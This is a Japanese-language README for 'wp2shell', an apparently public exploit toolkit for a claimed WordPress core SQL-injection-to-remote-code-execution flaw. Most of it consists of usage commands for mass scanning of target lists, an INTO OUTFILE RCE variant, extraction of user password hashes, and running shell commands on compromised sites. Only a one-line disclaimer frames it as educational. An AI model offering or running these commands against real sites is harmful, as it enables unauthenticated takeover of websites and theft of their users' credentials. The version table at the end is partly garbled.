
wp2shell - WordPress CVE-2026-63030 エクスプロイト & スキャナー
⚡ CVE-2026-63030 (wp2shell) 向けの高速・リアルタイム脆弱性スキャナ&エクスプロイト
wp2shell は、WordPress の深刻な脆弱性 CVE-2026-63030 を検出・悪用するための包括的ツールキットです。この脆弱性により、認証されていない攻撃者が REST API のバッチルート混乱と SQL インジェクションを組み合わせてリモートコード実行を行うことができます。
CVE-2026-63030 (wp2shell) は、Adam Kues(Assetnote / Searchlight Cyber)によって発見された WordPress コアに影響する深刻な脆弱性です。以下の2つのバグを組み合わせたものです:
author__not_in SQL インジェクション# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell
# No dependencies required - uses Python standard library only!
# Python 3.7+ required
大規模な脆弱性検出のためのマルチスレッド・リアルタイムスキャナ。
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt
# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test
# JSON output
python wp2shell_scanner.py -f list.txt -j
INTO OUTFILE RCE バリアントを実証します(MySQL の FILE 権限が必要)。
# Single target
python3 wp2shell_intooutfile.py https://target.com
# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10
フル機能を備えた、移植可能な単一ファイル版エクスプロイト。
# Check vulnerability
python wp2shell-exploit.py check https://target.com
# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users
# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint
# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"
重要:このツールは教育目的および許可を受けたテスト目的専用です。
| バージョン範囲 |
|---|
| 影響 |
|---|
| ステータス |
|---|
| 6.9.0 - 6.9.4 | 🔴 RCE(クリティカル) | ❌ 脆弱 |
| 7.0.0 - 7.0.1 | 🔴 RCE(クリティカル) | ❌ 脆弱 |
| 6.8.0 - 6.8.5 | 🟡 SQLi(高) | ❌ 脆弱 |
| 6.9.5+ / 7.0.2+ | ✅ パッチ済み | ✅ 安全 |